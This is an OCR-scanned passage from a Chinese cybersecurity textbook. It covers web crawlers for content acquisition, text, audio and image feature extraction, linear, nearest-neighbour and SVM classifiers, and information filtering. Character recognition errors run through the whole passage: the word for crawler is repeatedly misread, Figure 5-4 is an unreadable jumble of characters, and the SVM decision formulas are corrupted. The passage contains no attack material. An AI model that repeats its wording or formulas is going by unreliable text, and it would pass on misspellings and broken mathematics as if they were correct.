JSSh 客 户 端 
音频 信息 点 
— " 视 /音频 信息 点 播 
图 像 信息 存储 视 /音频 信息 
屏幕 录像 
网 络 媒体 信息 获取 


图 5-3 基于 浏览 器 模拟 实现 网 络 媒体 信息 获取 


5.3.3. ”信息 内 容 获取 的 典型 工具 


网 络 怜 虫 是 在 互联 网 上 实施 信息 内 容 获取 的 主要 工具 。 网 络 怜 虫 是 一 种 按照 一 定 的 
规则 ,自动 抓 取 互联 网 信息 的 程序 或 者 脚本 。 互 联网 上 的 信息 发 布 是 分 散 的 和 独立 的 ,但 
信息 间 又 是 相互 连接 的 。 息 虫 就 在 超 链接 所 建立 的 网 上 穿梭 ,这 是 候 虫 又 被 称 为 蜂 蛛 的 
原因 。 

互联 网 信息 资源 非常 庞大 ,在 有 限 的 网 络 资源 的 条 件 下 ,网 络 怜 虫 必须 有 选择 性 。 针 
对 不 同 的 服务 对 象 和 行为 ,网 络 爬 虫 大 体 分 为 两 类 。 一 类 是 服务 于 搜索 引擎 等 搜索 类 应 
用 的 网 络 爬 虫 , 它 的 信息 抓 取 规 则 是 尽 可 能 地 覆盖 更 多 的 互联 网 网 站 ,单一 网 站 内 的 搜索 
深度 要 求 不 高 。 另 一 类 是 服务 于 针对 性 进行 信息 收集 的 应 用 的 网 络 朴 虫 ,例如 ,与 情 分 析 
系统 要 求 它 的 网 络 怜 虫 具备 高 搜索 深度 和 一 定 的 主题 选择 能 力 。 具 有 高 搜索 深度 的 疏 虫 
被 称 为 路 径 追 溯 疏 虫 ,该 类 爬虫 深入 地 尽 可 能 抓 取 给 定 网 站 的 全 部 资源 ;具有 主题 选择 能 
力 的 怜 虫 被 称 为 主题 假 虫 ,该 类 疏 虫 会 判断 抓 取 的 资源 是 否 属于 用 户 指定 的 主题 ,并 持续 

195 


网 络 空间 安全 导论 


对 有 关 给 定 主题 的 网 页 进行 搜索 和 抓 取 。 

通常 ,与 情 分 析 系 统 采用 的 怜 虫 是 以 上 介绍 的 两 类 疏 虫 的 组 合 ,并 做 一 定 的 定制 改 
动 。 随 着 网 络 技术 的 复杂 化 ,网 络 疏 虫 也 面临 着 越 来 越 多 的 新 问题 ,例如 支持 Frame 的 
网 页 的 处 理 , 登 录 页 面 的 处 理 等 。 其 次 ,智能 手持 设备 及 相应 应 用 (例如 微 信 手 机 版 ) 的 发 
展 ,使 得 互联 网 资源 的 下 载 必 须 从 单纯 模拟 浏览 器 浏览 行为 的 候 虫 ,发 展 为 能 够 模拟 操作 
APP 的 怜 虫 。 然 后 ,对 于 个 性 化 定制 内 容 的 网 站 ( 微 博 和 微 信 都 属于 此 类 网 站 ,每 一 个 用 
户 登录 后 所 得 到 的 信息 内 容 均 不 相同 ) ,如 何 持续 保持 登录 状态 ,如 何 自 动 修改 定制 (例如 
加 关注 ) 以 得 到 更 多 信息 ,都 是 在 此 类 网 站 抓 取信 息 需要 处 理 的 问题 。 

网 络 怜 虫 通常 采用 分 布 式 机 制 来 保证 信息 获取 的 全 面 性 和 时 效 性 。 由 于 互联 网 资源 
规模 巨大 ,而 下 载 需要 时 间 , 所 以 网 络 息 虫 都 采用 多 进程 或 者 多 线程 ,甚至 是 分 布 式 方式 ， 
同时 下 载 多 个 网 络 资源 (文本 、 图 片 .音频 或 者 视频 等 ) ,也 就 是 说 这 是 一 项 群体 作业 , 怜 虫 
们 (下载 器 ) 集 体 一 起 完成 抓 取 的 任务 (这 也 是 网 络 爬 虫 也 被 称 为 蚂蚁 的 原因 )。 网 络 疏 虫 
还 需要 避免 过 于 频繁 获取 信息 而 被 媒体 网 站 判 为 "恶意 ”。 一 方面 可 通过 适当 选择 周期 所 
历时 间 间 隔 , 防 止 信息 获取 行为 造成 网 络 媒体 负载 过 重 ; 另 一 方面 则 可 通过 定期 修改 用 于 
内 容 获取 的 网 络 客户 端 信息 请 求 内 容 ( 内 容 协商 行为 ) ,避免 遭 遇 目标 网 络 媒体 的 拒绝 
服务 。 


5.3. ”信息 内 容 特 征 抽取 与 选择 


信息 内 容 的 表示 及 其 特征 项 的 选取 是 数据 挖掘 、 信 息 检索 的 一 个 基本 问题 , 它 把 从 信 
息 中 抽取 出 的 特征 词 进行 量化 来 表示 文本 信息 。 将 它们 从 一 个 无 结构 的 原始 信息 内 容 转 
化 为 结构 化 的 计算 机 可 以 识别 处 理 的 信息 , 即 对 信息 内 容 进行 科学 的 抽象 ,建立 它 的 数学 
模型 ,用 以 描述 和 代替 信息 内 容 , 从 而 使 计算 机 能 够 通过 对 这 种 模型 的 计算 和 操作 来 实现 
对 信息 内 容 的 识别 。 


1. 文本 信息 内 容 的 特征 抽取 与 选择 
对 文本 信息 内 容 而 言 ,由 于 文本 是 非 结构 化 的 数据 ,要 想 从 大 量 的 文本 中 挖掘 有 用 的 
信息 就 必须 首先 将 文本 转化 为 可 处 理 的 结构 化 形式 。 目 前 人 们 通常 采用 向 量 空间 模型 来 
描述 文本 向 量 , 但 是 如 果 直 接 用 分 词 算法 和 词 频 统 计 方法 得 到 的 特征 项 来 表示 文本 向 量 
中 的 各 个 维 ,那么 这 个 向 量 的 维度 将 非常 大 。 这 种 未 经 处 理 的 文本 矢量 不 仅 给 后 续 工 作 
带 来 巨大 的 计算 开销 ,使 整个 处 理 过 程 的 效率 非常 低下 ,而 且 会 损害 分 类 、 聚 类 算法 的 精 
确 性 ,从 而 使 得 到 的 结果 很 难 令 人 满意 。 因 此 ,必须 对 文本 向 量 做 进一步 净化 处 理 ,在 保 
证 原文 含义 的 基础 上 , 找 出 对 文本 特征 类 别 最 具 代 表 性 的 文本 特征 。 为 了 解决 这 个 问题 ， 
最 有 效 的 办 法 就 是 通过 特征 选择 来 降 维 。 
文本 特征 选择 对 文本 内 容 的 过 滤 和 分 类 、 聚 类 处 理 、 自 动 摘要 以 及 用 户 兴 趣 模式 发 
现 、 知 识 发 现 等 有 关 方面 的 研究 都 有 非常 重要 的 影响 。 通 常 根 据 某 个 特征 评估 函数 计算 
各 个 特征 的 评分 值 ,然后 按 评分 值 对 这 些 特征 进行 排序 ,选取 若干 个 评分 值 最 高 的 作为 特 
征 词 ,这 就 是 特征 选择 。 特 征 选取 的 方式 有 4 Rb: 
CD 用 映射 或 变换 的 方法 把 原始 特征 变换 为 较 少 的 新 特征 。 
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Q 从 原始 特征 中 挑选 出 一 些 最 具 代表 性 的 特征 。 

@ 根据 专家 的 知识 挑选 最 有 影响 的 特征 。 

CD 用 数学 的 方法 进行 选取 , 找 出 最 具 分 类 信息 的 特征 ,这 种 方法 是 一 种 比较 精确 的 
方法 ,人 为 因素 的 干扰 较 少 ,尤其 适合 于 文本 自动 分 类 挖掘 系统 的 应 用 。 

特征 选择 已 经 有 了 很 多 成 熟 的 方法 , 绝 大 多 数 都 是 基于 统计 的 。 信 品 比 (Signal-to- 
Noise Ratio) 源 于 信号 处 理 领 域 , 表 示 信 号 强度 与 背景 噪声 的 差 值 。 如 果 将 特征 项 作为 一 
个 信号 来 看 待 ,那么 特征 项 的 信 噪 比 可 以 作为 该 特征 项 对 文本 类 别 区 分 能 力 的 体现 。 信 
息 增 益 (Information Gain) 是 机 器 学 习 领 域 ,尤其 是 构建 决策 树 分 类 器 时 常 采用 的 特征 选 
择 方法 ,信息 增益 也 利用 到 信息 科 的 概念 ,依据 特征 项 与 类 别 标签 之 间 的 统计 关系 作为 评 
价 指标 。 卡 方 统计 (Chi-Square Statistic) 的 判断 依据 是 特征 项 与 类 别 标签 的 相关 程度 。 
认为 一 个 特征 项 与 某 个 类 别 如 果 满 足 同 时 出 现 的 情况 , 则 说 明 该 特征 项 能 比较 好 地 代表 
该 类 别 。 当 单纯 的 特征 选择 无 法 满足 信息 表示 的 要 求 时 ,需要 进行 特征 重 构 。 特 征 重 构 
以 特征 项 集合 为 输入 ,利用 对 特征 项 的 组 合 或 转换 生成 新 的 特征 集合 作为 输出 。 


2. 音频 信息 内 容 的 特征 抽取 与 选择 

对 于 音频 信息 内 容 ,充分 地 分 析 和 提取 其 物理 特征 (例如 频谱 等 )、 听 觉 特 征 ( 例 如 响 
度 .音色 等 ) 和 语义 特征 (例如 语音 的 关键 词 .音乐 的 旋律 节奏 等 ), 有 效 地 实现 音频 信息 的 
内 容 分 类 和 检索 至 关 重 要 。 根 据 检索 对 象 和 检索 方法 的 不 同 , 国 内 外 在 音频 检索 方面 的 
研究 大 致 分 为 语音 检索 .音乐 内 容 检 索 和 音乐 例子 检索 几 类 。 音 频 检 索 第 一 步 是 建立 数 
据 库 ,对 音频 数据 进行 特征 提取 ,并 通过 特征 对 数据 聚 类 。 然 后 检索 引擎 对 特征 向 量 与 聚 
类 参数 集 匹 配 , 按 相关 性 排序 后 通过 查询 接口 返回 给 用 户 。 音 频 信号 的 特征 抽取 指 提取 
音频 的 时 域 和 频 域 特征 ,将 不 同 内 容 的 音频 数据 予以 区 分 。 因 此 ,所 选取 的 特征 应 该 能 够 
充分 地 反映 音频 的 物理 和 听觉 特征 ,对 环境 的 改变 具有 较 好 的 鲁 棒 性 。 在 进行 音频 特征 
抽取 时 ,通常 将 音频 划分 为 等 长 的 片段 ,在 每 个 片段 内 有 划分 帧 。 这 样 ,特征 抽 取 所 采用 
的 特征 包括 基于 帧 的 特征 和 基于 片段 的 特征 两 种 。 

基于 帧 的 音频 特征 主要 有 以 下 几 种 : 

(D MFCC; 语音 识别 中 十 分 重要 的 特征 ,在 音频 应 用 中 也 有 很 好 的 效果 , 它 是 基于 
Mel 频率 的 倒 谱 系数 (Mel Frequency Cepstrum Coefficient) 。 由 于 MFCC 参数 将 人 耳 的 
听觉 感知 特性 和 语音 的 产生 机 制 相 结合 ,因此 得 到 广泛 的 使 用 。 

@ 频 域 能 量 : 可 以 用 来 根据 冰 值 判别 静音 帧 ,是 区 分 音乐 和 语言 的 有 效 特征 ,通常 
语音 中 含有 比 音乐 中 更 多 的 静音 ,因此 语音 的 频 域 能 量 比 音乐 中 的 变化 大 得 多 。 

@ 子 带 能 量 比 : 将 频带 划分 为 几 个 区 间 , 其 中 每 个 区 间 称 为 子 带 ,一 般 采 用 非 均 匀 
的 划分 方式 ,特别 是 Bark 尺度 或 ERB 尺度 。 不 同类 型 的 音频 ,其 能 量 在 各 个 子 带 区 间 的 
分 布 有 所 不 同 , 音 乐 的 频 域 能 量 在 各 个 子 带 上 的 分 布 比较 均匀 ,而 语音 的 能 量 主要 集中 在 
第 1 个 子 带 上 ,往往 占 80% 左 右 。 

CD 过 零 率 : 描述 音频 信号 通过 过 零 值 的 次 数 , 是 信号 频率 的 一 个 简单 度量 ,可 以 在 
一 定 程 度 上 反映 其 频谱 的 粗略 估计 。 通 常 语音 信号 由 发 音 音节 和 不 发 音 音节 交 蔡 构成 ， 
音乐 没有 这 种 结构 ;语音 信号 中 ,清音 的 过 零 率 高 ,浊音 的 过 零 率 低 。 所 以 过 零 率 在 语音 
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信和 号 的 变化 要 比 在 音乐 的 变化 剧烈 。 

C 基 音 频率 : 在 周期 或 准 周期 音频 信号 中 ,声音 的 成 分 主要 由 基 频 ( 基 音 频率 ) 及 其 
谐 波 组 成 ,而 对 于 非 周期 信号 则 不 存在 基 频 。 基 音频 率 可 以 反映 音调 的 高 低 , 可 以 采用 短 
时 自 相关 方法 进行 粗略 计算 。 

根据 上 面 介绍 的 帧 层次 的 基本 特征 ,在 音频 处 理 中 , 常 在 片段 层次 上 计算 这 些 特征 的 
统计 值 ,作为 该 片段 的 分 类 特征 。 常 见 的 基于 片段 的 音频 特征 主要 有 以 下 几 种 : 

CD 静音 帧 率 : 如 果 一 帧 的 能 量 和 过 零 率 小 于 给 定 的 阔 值 ,一 般 认 为 该 帧 是 静音 帧 ， 
否则 该 帧 是 非 静音 帧 。 静 音 帧 率 为 静音 帧 数 与 片段 中 帧 总 数 的 比例 。 语 音 中 经 常 有 停顿 
的 地 方 , 所 以 其 静音 帧 率 一 般 比 音乐 的 高 。 

Q) 高 过 零 率 帧 率 ; 根据 对 过 零 率 特征 的 分 析 , 语 音 由 清音 和 浊音 交替 构成 ,而 音乐 
不 具有 这 种 结构 ,因此 ,过 零 率 在 语音 信号 中 要 高 于 音乐 信号 中 。 对 于 一 个 片段 来 说 , 语 
音信 号 过 零 率 高 于 阅 值 的 比例 高 于 音乐 信号 中 的 比例 。 

C) 低能 量 帧 率 : 低能 量 帧 率 (Low Energy Frame Ratio,LER) 是 指 一 段 音频 信号 中 
能 量 低 于 阅 值 的 比例 。 一 般 来 说 ,语音 比 音乐 含有 更 多 的 静音 帧 ,因此 语音 信号 的 低能 量 
帧 率 高 于 音乐 信号 。 

CD 谱 通 量 : ifi ht Spectrum Flux,SF) 也 称 为 频谱 流量 , 指 片段 中 相 邻 帧 之 间 谱 变 
化 的 平均 值 。 从 整体 上 看 ,语音 信号 的 谱 通 量 数值 较 高 ,而 音乐 信号 的 谱 通 量 往往 较 小 ， 
其 他 声音 的 谱 通 量 数值 介 于 两 者 之 间 。 

C) 和 谐 度 : 如 果 一 帧 信号 不 存在 基 频 ,可 以 认为 其 基 频 为 零 。 这 样 就 可 以 用 片段 中 
基 音 频率 不 等 于 零 的 帧 数 所 占 的 比例 来 衡量 该 音频 片段 的 和 谐 程度 。 一 般 来 说 ,语音 
低频 频带 的 和 谐 度 较 高 ,高 频频 带 的 和 谐 度 较 低 ; 而 音乐 在 整个 频率 范围 内 都 具有 较 高 的 
和 谐 度 。 


3. 图 像 信息 的 特征 抽取 与 选择 

相 比 文本 信息 而 言 ,数字 图 像 具 有 信息 量 大 、 像 素 点 之 间 的 关联 性 强 等 特点 。 因 此 ， 
对 于 数字 图 像 的 处 理 方法 与 文本 处 理 方 法 有 较 大 的 差别 。 图 像 的 特征 抽取 和 选择 主要 包 
$ A FJUTJ il : 

(1) 图 像 颜色 特征 提取 

所 谓 图 像 的 颜色 特征 ,通俗 地 说 , 即 能 够 用 来 表示 图 像 颜色 分 布 特点 的 特征 向 量 。 常 
见 的 颜色 特征 有 : 颜色 直方 图 .颜色 聚合 矢量 .颜色 和 矩 等 。 

所 谓 颜 色 直方 图 (Color Histogram) , 即 反映 特定 图 像 中 的 颜色 级 与 出 现 该 种 颜色 的 
概率 之 间 关 系 的 图 形 。 颜 色 直 方 图 仅仅 从 某 种 颜色 出 现 的 概率 来 描述 图 像 的 颜色 特征 。 
然而 ,完全 不 同 的 图 像 可 能 具有 类 似 的 直方 图 。 为 了 能 够 方便 区 分 该 种 情况 ,需要 引入 颜 
色 以 外 的 信息 。 颜 色 聚 合 矢量 (Color Coherence Vector. CCV) 的 出 发 点 在 于 引入 一 定 
的 空间 信息 来 进一步 区 分 颜色 分 布 类 似 而 空间 分 布 不 同 的 图 像 。 颜 色 矩 (Color 
Moments) 是 一 种 统计 特征 ,用 来 反映 图 像 中 颜色 分 布 的 特点 ,通过 引入 统计 学 中 低 阶 矩 
(Moment) 的 概念 ,来 描述 整个 图 像 的 颜色 变化 情况 。 在 图 像 分 类 .索引 等 应 用 中 ,可 以 
通过 计算 颜色 矩 的 距离 来 反映 图 像 之 间 的 相似 程度 。 常 见 的 颜色 矩 往 往 假定 图 像 内 的 某 
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种 颜色 符合 特定 的 概率 分 布 ,在 此 基础 上 选择 有 鉴别 力 的 统计 特征 。 

(2) 图 像 纹理 特征 提取 

图 像 纹理 特征 提取 能 够 用 来 表示 图 像 纹 理 ( 亮 度 变 化 ) 特 点 的 特征 向 量 。 纹 理 信 息 是 
亮度 信息 和 空间 信息 的 结合 体 , 反 映 了 图 像 的 亮度 变化 情况 。 常 见 的 纹理 特征 有 : 灰 度 
共生 和 矩阵 .Gabor 小 波 特征 、Tamura 纹理 特征 等 。 

* 灰 度 共生 矩阵 (Grey level co-occurrence matrix. GLCM) 是 最 早期 用 于 描述 纹理 
特征 的 方法 。 灰 度 共生 和 矩阵 的 元 素 PG. 7 代表 相距 一 定 距 离 的 两 个 像素 点 ,分 
别 具 有 灰 度 值 ; 和 j 的 出 现 概率 。 该 矩阵 依赖 于 这 两 个 像素 之 间 的 距离 ( 记 作 
dist) ,以 及 这 两 个 像素 连 线 与 水 平 轴 的 夹 角 ( 记 作 0 ) ,改变 这 两 个 参数 能 够 得 到 
不 同 的 矩阵 。 共 生 和 矩阵 反映 了 图 像 灰 度 分 布 关于 方向 ` 局 部 邻 域 和 变化 幅度 的 综 
合 信息 。 一 旦 矩阵 P 确定 了 ,就 能 够 从 中 提取 代表 该 矩阵 的 特征 ,一般 可 分 为 四 
类 : 视觉 纹理 特征 、 统 计 特征 、 信 息 特 征 和 信息 相关 性 特征 。 

。 Gabor 小 波 特 征 (Gabor Wavelet Feature) 是 一 种 特殊 的 小 波 特征 ,其 基本 原理 是 
通过 小 波 变 换 对 原 有 图 像 进行 滤波 (filtering) 处 理 , 然 后 对 于 滤波 后 的 图 像 提 取 
相关 有 鉴别 力 的 特征 。 小 波 特征 的 鉴别 力 往 往 取决 于 小 波 基 的 选取 。 相 比 金 字 
塔 结构 的 小 波 变换 (PWT) 、 树 结构 的 小 波 变换 (TWT) 等 ,Gabor 小 波 更 符合 人 眼 
对 于 图 像 的 响应 ,故而 常常 用 于 描述 图 像 的 纹理 特征 。 

* Tamura 等 人 根据 人 类 视觉 感知 系统 的 特点 ,定义 了 6 种 与 之 相 适 应 的 纹理 特征 : 
Tamura fH f& Bf (Coarseness) ,Xf EE £ (Contrast) , 77 [8] f£ CDirectionality) 、 线 相似 
fECLine-likeness) .规则 性 (Regularity) 和 粗略 度 (Roughness) 。 

(3) 其 他 图 像 特 征 

除了 以 上 两 种 常用 的 图 像 特 征 , 现 有 的 图 像 分 类 检索 系统 中 还 使 用 边缘 特征 和 轮廓 
特征 。 

边缘 指 的 是 灰 度 ( 颜 色 ) 存 在 较 大 差异 的 像素 点 .一 般 边缘 点 存在 于 目标 /背景 的 分 界 
处 ,或 者 目标 内 部 纹理 区 域 。 这 些 信息 都 从 一 定 侧面 反映 了 图 像 的 内 容 。 因 此 ,边缘 特征 
也 常常 被 用 于 图 像 分 类 、 理 解 系统 之 中 ;轮廓 特征 是 用 来 描述 图 像 内 某 些 目 标 物体 的 轮廓 
信息 ,从 而 为 识别 目标 物体 提供 形状 方面 的 信息 ,进而 为 理解 图 像 内容 提 供 线索 。 


54 。 信息 内 容 分 析 与 处 理 


海量 信息 内 容 分 析 的 基本 处 理 环节 可 以 归结 为 分 类 和 过 滤 , 其 他 更 加 复杂 的 处 理 问 
题 则 是 上 述 简 单 处 理 问题 的 组 合 。 在 信息 检索 和 文本 编辑 等 应 用 中 ,快速 对 用 户 定义 的 
模式 或 者 短语 进行 分 类 是 最 常见 的 需求 。 在 文本 信息 过 滤 的 处 理 中 ,分 类 算法 也 一 直 是 
人 们 所 关注 的 。 一 个 高 效 的 分 类 算法 会 使 信息 处 理 变 得 迅速 而 准确 ,从 而 得 到 使 用 者 的 
认可 ;反之 ,会 使 处 理 过 程 变 得 元 长 而 模糊 ,让 人 难以 忍受 。 


5.4.4 ”信息 内 容 分 类 


分 类 算法 在 图 像 分 类 .索引 和 内 容 理解 方面 都 有 直接 的 应 用 ,其 主要 功能 是 : 通过 分 
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析 不 同 图 像 类 别 的 图 像 特征 之 间 存 在 的 差异 ,将 其 按 内 容 分 成 若干 类 别 。 经 过 几 十 年 的 
研究 与 实践 ,目前 已 经 有 数 十 种 分 类 方法 。 图 5-4 给 出 了 主要 的 分 类 方法 和 它们 之 间 的 
基本 关系 。 


模式 分 类 量 


设计 方法 
| 
于 统计 基于 知识 工程 
的 方法 的 方法 
| 
自动 归 类 (有 指导 ) 自动 聚 类 (无 指导 ) 
[ie 
基于 概率 密度 基于 参数 估计 数值 矢量 法 。 图 分 类 逐步 
的 估计 的 方法 聚 类 法 
r3 | | | 
小 自 密 zx E 
尼 最 最 线性 判别 非 线性 判别 BotkR «5 d. 
蝇 小 小 函数 函数 聚 取 击 测 手法 X4 
[a 风 最 | 类 大 下 试 Ho 类 模 
尔 险 大 BBSXE 分 BW 
828 DLLIII ITITIII] 88 —£ x 
$ "ERRE zu-kBrm Zi E 
含 知 小 小 机 BHSEEEUS?A it 
T dk EXE 
线 则 分 方 小 设 方 别 分 法 量 半 
itg Ro db om Ro PL 
HFEExG s B 时 
» ^ WX 法 
准则 准 
Wo d 


图 5-4 主要 的 分 类 方法 和 它们 之 间 的 基本 关系 


任何 分 类 器 构建 都 可 以 抽象 为 一 个 学 习 的 过 程 ,而 学 习 又 分 为 监督 学 习 (Supervised 
Learning) 和 无 监督 学 习 (Unsupervised Learning) 两 种 。 监 督 训 练 是 指 存在 一 个 已 标定 
的 训练 集 (Training Set) ,并 根据 该 集合 确定 分 类 器 各 项 参数 ,完成 对 于 分 类 器 的 构建 。 
对 于 无 监督 训练 来 说 ,并 不 存在 训练 集 ,分 类 器 的 各 项 参数 仅仅 由 被 分 类 的 数据 本 身 ( 并 
无 标定 的 类 别 )? 决 定 。 本 小 节 将 对 应 用 于 图 像 .文本 分 类 的 各 种 分 类 器 做 一 个 由 浅 入 深 的 
介绍 。 值 得 一 提 的 是 ,本 小 节 中 介绍 的 分 类 器 旨 在 解决 二 类 分 类 问题 ( 即 目标 类 别 数 为 
2) ,对 于 多 类 分 类 问题 , 则 需要 对 原 算法 作 适 当 的 延伸 和 拓展 。 


1. 线性 分 类 器 

线性 分 类 器 通过 训练 集 构造 一 个 线性 判别 函数 ， 
在 运行 过 程 中 根据 该 判别 函数 的 输出 ,确定 数据 类 
别 。 线 性 分 类 器 结构 如 图 5-5 所 示 。 

分 类 结果 完全 依赖 于 线性 判别 函数 的 输出 : 如 果 
输出 为 正 , 则 判别 为 第 一 类 Ci ;如 果 输 出 为 负 , 则 判别 
为 第 二 类 C. ;如 果 输 出 为 0, 则 不 能 作出 判断 (这 种 情 
况 现实 应 用 中 出 现 得 比较 少 ) 。 
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对 于 二 维 样本 来 说 ,线性 分 类 器 可 表示 为 二 维 空间 的 一 条 直线 ;对 于 三 维 样本 ,线性 
分 类 器 可 表示 为 三 维 空间 的 一 个 平面 ;对 于 多 维 样本 , 则 可 表示 为 多 维 空间 的 一 个 超 
平面 。 
由 于 线性 分 类 器 结构 相对 简单 ,整个 学 习 的 优化 过 程 计算 复 杂 度 较 低 , 泛 化 
(Generalization) 能 力 相对 较 强 。 然 而 ,对 于 样本 分 布 不 可 线性 分 割 的 情况 ,线性 分 类 器 
不 能 获得 令 人 满意 的 效果 。 


2. 最 近邻 分 类 法 

最 近邻 分 类 法 是 图 像 分 类 和 识别 领域 比较 常用 的 分 类 方法 , 相 比 其 他 分 类 器 (如 线性 
分 类 器 支持 向 量 机 等 ) ,没有 复杂 的 学 习 过 程 , 其 分 类 结果 仅仅 取决 于 测试 样本 与 各 类 训 
练 样本 点 之 间 的 距离 。 具 体 而 言 ,最 近邻 分 类 方法 如 下 : 

记 第 i 类 的 训练 样本 为 

S;—(Sa.Sa, Su). i=1,2,,C 
其 中 ,n; 代表 第 i 类 的 样本 总 数 ;C 代表 类 别 总 数 , 记 测试 样本 为 X。 

首先 计算 X 和 训练 样本 的 距离 ,根据 与 测试 样本 X 之 间 的 距离 ,寻找 与 之 最 为 接近 
的 & 个 邻近 样本 点 : N 二 {Ni,Ns,…,Ni,) ,然后 判断 这 些 邻 近 样 本 点 中 哪个 类 别 的 训练 
样本 最 多 ,提取 包含 训练 样本 数 最 多 的 类 别 , 记 作 。。 最 后 将 测试 样本 归 入 第 。 类。 

最 近邻 分 类 方法 有 以 下 特点 : 

CD 不 需要 复杂 的 学 习 优 化 过 程 ,但 分 类 过 程 需要 计算 与 所 有 训练 样本 的 距离 ,有 一 
定 的 计算 量 。 有 些 改进 最 近邻 方法 从 每 个 类 别 的 训练 集中 找 出 一 定数 量 的 “代表 ”样本 ， 
可 减少 一 定 的 计算 量 。 

@ 与 线性 分 类 器 相 比 ,最 近邻 分 类 法 的 分 界面 可 以 不 是 一 个 超 平面 而 是 一 个 更 复杂 
的 曲线 。 因 此 可 以 从 一 定 程度 上 解决 图 像 特 征 分 布 复杂 多 样 的 问题 。 


3. 支持 向 量 机 

支持 向 量 机 (Support Vector Machine,SVM) 是 一 种 监督 学 习 的 方法 , 它 广泛 应 用 于 
统计 分 类 以 及 回归 分 析 中 。 支 持 向 量 机 属于 一 般 化 线性 分 类 器 ,能 够 同时 最 小 化 经 验 误 
差 与 最 大 化 几何 边缘 区 。 因 此 支持 向 量 机 也 被 称 为 最 大 边缘 区 分 类 器 。 

对 于 线性 可 分 的 数据 来 说 ,支持 向 量 机 可 被 归 类 为 一 种 线性 分 类 器 。 在 线性 可 分 的 
情况 下 ,支持 向 量 机 寻求 一 个 能 把 样本 数据 分 开 的 分 界线 wx c b 一 0( 对 于 二 维 数据 来 说 
是 直线 ,三 维 是 平面 ,高 维 则 是 超 平面 )。 如 图 5-6 所 示 , 对 于 两 类 数据 (分 别 以 “X” 和 
“O 〇 ”表示 ) ,SVM 寻求 的 是 如 下 的 分 界线 ,满足 : 

对 于 第 一 类 数据 (图 中 以 “X ”表示 ) wx d bis 

对 于 第 二 类 数据 (图 中 以 “ 〇 ”表示 ) wx; b. 

如 果 没 有 训练 数据 被 分 界线 错误 分 割 , 则 称 该 训练 数据 是 线性 可 分 的 ,边界 上 的 样本 
被 称 为 支持 向 量 。 对 于 测试 数据 ,只 需要 计算 wxi 十 b 的 符号 即 可 。 如 果 y; 一 sgnCwxi 十 
0) 一 一 1, 则 将 测试 数据 归 和 第 一 类 :如果 yi 一 sgnCwxi 十 p) 王 十 1, 则 将 测试 数据 归 入 第 
二 类 ;如 果 y; 二 sgn(wxi 十 b) 二 0, 则 不 能 判断 该 数据 类 别 ( 现 实 应 用 中 发 生 较 少 ,尤其 数 
据 量 较 大 时 )。 
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图 5-6 SVM 分 类 示意 图 


5.4.2 ”信息 内 容 过 滤 

信息 过 滤 是 大 规模 内 容 处 理 的 一 种 典型 操作 , 它 是 对 陆续 到 达 的 信息 进行 过 滤 操 作 ， 
可 以 认为 是 满足 用 户 信息 需求 的 信息 选择 过 程 ,将 符合 用 户 需求 的 信息 保留 ,将 不 符合 用 
户 需 求 的 信息 过 滤 掉 。 

从 另 一 个 角度 给 出 信息 过 滤 的 另 一 个 定义 : 信息 过 滤 是 指 从 动态 的 信息 流 中 将 满足 
用 户 兴 趣 的 信息 挑选 出 来 ,用 户 的 兴趣 一 般 在 较 长 一 段 时 间 内 不 会 改变 (静态 )。 信 息 过 
滤 通 常 是 在 输入 数据 流 中 移 除数 据 ,而 不 是 在 输入 数据 流 中 找到 数据 。 通 用 信息 过 滤 模 
型 如 图 5-7 所 示 。 


用 户 详细 信息 


数据 项 


(0) 
数据 分 析 部 分 


用 户 特征 描述 
5-7 通用 信息 过 滤 模 型 


实际 上 ,在 内 容 安全 领域 ,信息 过 滤 是 提供 信息 的 有 效 流 动 ,消除 或 者 减少 信息 过 量 、 
信息 混乱 ,信息 滥用 造成 的 危害 ,但 在 目前 的 研究 阶段 看 ,仍然 处 于 较为 初级 的 研究 阶段 ， 
为 用 户 剔 除 不 合适 的 信息 是 当前 内 容 安全 领域 信息 过 滤 的 主要 任务 之 一 。 

信息 过 滤 技 术 有 很 多 种 不 同 的 分 类 方法 。 按 照 主 动 性 分 ,可 以 分 为 主动 信息 过 滤 和 
被 动 信息 过 滤 ; 按 照 过 滤器 所 在 位 置 ,可 以 分 为 在 信息 的 源头 、 在 服务 器 和 在 客户 端 过 滤 ; 
按照 过 滤 的 方法 ,可 以 分 为 基于 内 容 的 过 滤 、 基 于 用 户 兴趣 的 过 滤 和 协同 过 滤 ; 根 据 获 得 
知识 的 方法 ,可 以 分 为 显 式 的 方式 和 隐 含 的 方式 。 
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根据 过 滤 目 的 的 不 同 , 可 以 把 信息 过 滤 分 为 两 类 : 一 是 以 用 户 ( 人 个人、 团体. 公司、 机 
构 ) 兴 趣 为 出 发 点 ,为 用 户 筛选 .提交 最 可 能 满足 用 户 兴 趣 的 信息 , 称 为 用 户 兴趣 过 滤 , 简 
称 " 用 户 过 滤 ”; 二 是 以 网 络 内 容 安全 为 出 发 点 ,为 用 户 去 除 可 能 造成 危害 的 信息 ,或 阻 断 
其 进一步 的 传输 , 称 为 安全 过 滤 。 

信息 内 容 过 滤 可 以 被 应 用 到 很 多 方面 ,以 下 是 它 最 常见 的 应 用 : 

QD Internet 搜索 结果 的 过 滤 : 即使 用 目前 最 好 的 搜索 引擎 Google 进行 搜索 ,同一 个 
问题 都 会 返回 数目 众多 的 结果 ,对 绝 大 多 数 用 户 来 说 ,这 是 一 个 令 人 头痛 的 问题 。 所 以 ， 
在 搜索 结果 中 进一步 按照 用 户 偏好 进行 过 滤 , 对 Internet 搜索 是 一 种 很 好 的 补充 。 

@ 用 户 电子 邮件 过 滤 : 电子 邮件 已 经 成 为 用 户 在 Internet 上 使 用 最 多 的 工具 之 一 。 
垃圾 邮件 烦恼 着 每 个 电子 邮件 用 户 。 使 用 信息 过 滤 技 术 , 可 以 在 反 垃圾 邮件 中 做 出 一 定 
的 贡献 。 

C 服务 器 /新 闻 组 过 滤 : 在 服务 器 /新 闻 组 端 ,在 第 一 时 间 对 不 良 信息 进行 过 滤 , 避 
免 类 似 信 息 的 传播 ,是 ISP 最 希望 做 到 的 。 所 以 将 信息 过 滤 技术 应 用 在 服务 器 /新 闻 组 有 
广阔 的 应 用 空间 。 

CD 浏览 器 过 滤 : 定制 客户 端的 浏览 器 ,按照 用 户 的 偏好 ,在 浏览 时 直接 对 相关 信息 
进行 过 滤 , 也 是 信息 过 滤 的 一 种 很 好 的 应 用 方向 。 

C) 专 为 未 成 年 人 的 过 滤 : 使 用 信息 过 滤 技 术 ,为 孩子 的 网 络 世 界 创造 一 个 洁净 的 天 
